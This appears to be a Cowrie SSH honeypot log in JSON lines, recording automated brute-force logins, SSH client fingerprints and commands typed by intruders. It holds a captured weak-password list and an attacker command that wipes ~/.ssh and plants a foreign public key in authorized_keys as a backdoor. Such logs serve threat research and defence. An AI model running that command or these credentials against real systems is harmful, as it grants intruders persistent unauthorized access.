{"eventid":"cowrie.login.failed","username":"temp","password":"temp","message":"login attempt [temp/temp] failed","sensor":"my-vps","timestamp":"2025-08-31T01:07:33.645032Z","src_ip":"212.227.235.229","session":"01b5d9355896"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:33.988720Z","src_ip":"212.227.125.160","session":"727efb051fe6"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:34.886217Z","src_ip":"212.227.235.229","session":"01b5d9355896"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34412,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7aa57903c20","protocol":"ssh","message":"New connection: 212.227.235.229:34412 (1.2.3.4:22) [session: e7aa57903c20]","sensor":"my-vps","timestamp":"2025-08-31T01:07:35.082038Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:07:35.082876Z","src_ip":"212.227.235.229","session":"e7aa57903c20"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:07:35.150128Z","src_ip":"212.227.235.229","session":"e7aa57903c20"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz!@#$","message":"login attempt [root/1qaz!@#$] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:07:35.457972Z","src_ip":"212.227.235.229","session":"e7aa57903c20"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:07:35.606132Z","src_ip":"212.227.235.229","session":"e7aa57903c20"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:07:35.606861Z","src_ip":"212.227.235.229","session":"e7aa57903c20"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:07:35.608001Z","src_ip":"212.227.235.229","session":"e7aa57903c20"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:35.677146Z","src_ip":"212.227.235.229","session":"e7aa57903c20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51958,"dst_ip":"1.2.3.4","dst_port":22,"session":"06636abf86a3","protocol":"ssh","message":"New connection: 212.227.125.160:51958 (1.2.3.4:22) [session: 06636abf86a3]","sensor":"my-vps","timestamp":"2025-08-31T01:07:35.794952Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:07:35.795752Z","src_ip":"212.227.125.160","session":"06636abf86a3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:07:36.331418Z","src_ip":"212.227.235.229","session":"e7aa57903c20"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:07:36.332166Z","src_ip":"212.227.235.229","session":"e7aa57903c20"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:07:36.334329Z","src_ip":"212.227.125.160","session":"06636abf86a3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:07:36.401478Z","src_ip":"212.227.235.229","session":"e7aa57903c20"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:36.402543Z","src_ip":"212.227.235.229","session":"e7aa57903c20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35088,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf1eb316f9dc","protocol":"ssh","message":"New connection: 212.227.235.229:35088 (1.2.3.4:22) [session: bf1eb316f9dc]","sensor":"my-vps","timestamp":"2025-08-31T01:07:36.465610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:07:36.466434Z","src_ip":"212.227.235.229","session":"bf1eb316f9dc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:07:36.535340Z","src_ip":"212.227.235.229","session":"bf1eb316f9dc"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-31T01:07:36.562301Z","src_ip":"212.227.125.160","session":"06636abf86a3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:07:36.843631Z","src_ip":"212.227.235.229","session":"bf1eb316f9dc"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:37.637750Z","src_ip":"212.227.125.160","session":"06636abf86a3"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:37.911259Z","src_ip":"212.227.235.229","session":"bf1eb316f9dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35688,"dst_ip":"1.2.3.4","dst_port":22,"session":"0165216ad55b","protocol":"ssh","message":"New connection: 212.227.235.229:35688 (1.2.3.4:22) [session: 0165216ad55b]","sensor":"my-vps","timestamp":"2025-08-31T01:07:37.979239Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:07:37.980367Z","src_ip":"212.227.235.229","session":"0165216ad55b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:07:38.048583Z","src_ip":"212.227.235.229","session":"0165216ad55b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:07:38.362098Z","src_ip":"212.227.235.229","session":"0165216ad55b"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:38.431235Z","src_ip":"212.227.235.229","session":"e7aa57903c20"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:38.432175Z","src_ip":"212.227.235.229","session":"0165216ad55b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43446,"dst_ip":"1.2.3.4","dst_port":22,"session":"b32077c93c5e","protocol":"ssh","message":"New connection: 212.227.125.160:43446 (1.2.3.4:22) [session: b32077c93c5e]","sensor":"my-vps","timestamp":"2025-08-31T01:07:46.192385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:07:46.193493Z","src_ip":"212.227.125.160","session":"b32077c93c5e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:07:46.266834Z","src_ip":"212.227.125.160","session":"b32077c93c5e"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam123","message":"login attempt [steam/steam123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:07:46.508672Z","src_ip":"212.227.125.160","session":"b32077c93c5e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:47.761872Z","src_ip":"212.227.125.160","session":"b32077c93c5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39472,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf172de432b4","protocol":"ssh","message":"New connection: 212.227.125.160:39472 (1.2.3.4:22) [session: cf172de432b4]","sensor":"my-vps","timestamp":"2025-08-31T01:07:56.597324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:07:56.598255Z","src_ip":"212.227.125.160","session":"cf172de432b4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:07:56.671437Z","src_ip":"212.227.125.160","session":"cf172de432b4"}
{"eventid":"cowrie.login.failed","username":"es","password":"es","message":"login attempt [es/es] failed","sensor":"my-vps","timestamp":"2025-08-31T01:07:56.896532Z","src_ip":"212.227.125.160","session":"cf172de432b4"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:57.995571Z","src_ip":"212.227.125.160","session":"cf172de432b4"}
{"eventid":"cowrie.session.connect","src_ip":"45.78.196.59","src_port":44964,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd0e075d694f","protocol":"ssh","message":"New connection: 45.78.196.59:44964 (1.2.3.4:22) [session: fd0e075d694f]","sensor":"my-vps","timestamp":"2025-08-31T01:08:00.589442Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:08:00.590441Z","src_ip":"45.78.196.59","session":"fd0e075d694f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:08:00.844669Z","src_ip":"212.227.235.229","session":"f2a7634de017"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T01:08:00.845418Z","src_ip":"212.227.235.229","session":"f2a7634de017"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:08:00.850827Z","src_ip":"45.78.196.59","session":"fd0e075d694f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50634,"dst_ip":"1.2.3.4","dst_port":22,"session":"129d323fb4bb","protocol":"ssh","message":"New connection: 212.227.125.160:50634 (1.2.3.4:22) [session: 129d323fb4bb]","sensor":"my-vps","timestamp":"2025-08-31T01:08:06.946531Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:08:06.947721Z","src_ip":"212.227.125.160","session":"129d323fb4bb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:08:07.021724Z","src_ip":"212.227.125.160","session":"129d323fb4bb"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX","message":"login attempt [root/1qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:08:07.345557Z","src_ip":"212.227.125.160","session":"129d323fb4bb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:08:07.641928Z","src_ip":"212.227.125.160","session":"129d323fb4bb"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:08:07.642741Z","src_ip":"212.227.125.160","session":"129d323fb4bb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:07.717952Z","src_ip":"212.227.125.160","session":"129d323fb4bb"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:07.719175Z","src_ip":"212.227.125.160","session":"129d323fb4bb"}
